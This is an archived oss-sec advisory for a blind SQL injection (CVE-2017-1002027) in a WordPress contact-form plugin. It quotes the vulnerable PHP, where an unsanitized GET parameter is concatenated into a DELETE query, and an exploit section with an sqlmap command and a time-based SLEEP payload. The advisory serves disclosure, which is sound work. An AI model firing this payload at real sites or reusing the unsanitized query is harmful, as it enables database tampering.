oss-sec mailing list archives
Authenticated Blind SQL Injection vulnerability in Wordpress plugin rk-responsive-contact-form v1.0
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 23 Aug 2017 08:22:07 -0400
Title: Authenticated Blind SQL Injection vulnerability in Wordpress plugin rk-responsive-contact-form v1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2017-07-01 CVE-ID:[CVE-2017-1002027] Download Site: https://wordpress.org/plugins/rk-responsive-contact-form/ Vendor: rkdevelopers Vendor Notified: 2017-08-05 Vendor Contact: plugins () wordpress org Advisory: http://www.vapidlabs.com/advisory.php?v=198 Description: A simple WordPress plugin that generates a responsive contact form on your website or blog Vulnerability: The variable $delid isn't sanitized before being passed into an SQL query in file ./rk-responsive-contact-form/include/rk_user_list.php : 1-<?php 2- global $wpdb; 3- $table_name = $wpdb->prefix . "rk_contact"; 4: $info=$_GET["info"]; 5- if($info=="del") 6- { 7: $delid=$_GET["did"]; 8- 9- $wpdb->query("delete from ".$table_name." where `user_id`=".$delid); 10- echo "<div style='clear:both;'></div><div class='updated' id='message'><p><strong>:".__('User Record Deleted.','rkcontactform')."</strong>.</p></div>"; 11- } 12-?> The attacker must have permission to modify contacts in order to exploit this vulnerability. Exploit Code: • $ sqlmap -u 'http://example.com/wp-admin/admin.php?page=rk_user_lists&info=del&did=*' --load-cookies=./cookie.txt --level=2 --risk=1 --dbms=mysql • • • URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 318 HTTP(s) requests: • --- • Parameter: #1* (URI) • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: http://example.com:80/wp-admin/admin.php?page=rk_user_lists&info=del&did=(CASE WHEN (6363=6363) THEN SLEEP(5) ELSE 6363 END) • --- • [10:57:22] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Ubuntu 16.04 (xenial) • web application technology: Apache 2.4.18 • back-end DBMS: MySQL >= 5.0.12 • [10:57:22] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' • • [*] shutting down at 10:57:22
Current thread:
- Authenticated Blind SQL Injection vulnerability in Wordpress plugin rk-responsive-contact-form v1.0 Larry W. Cashdollar (Aug 23)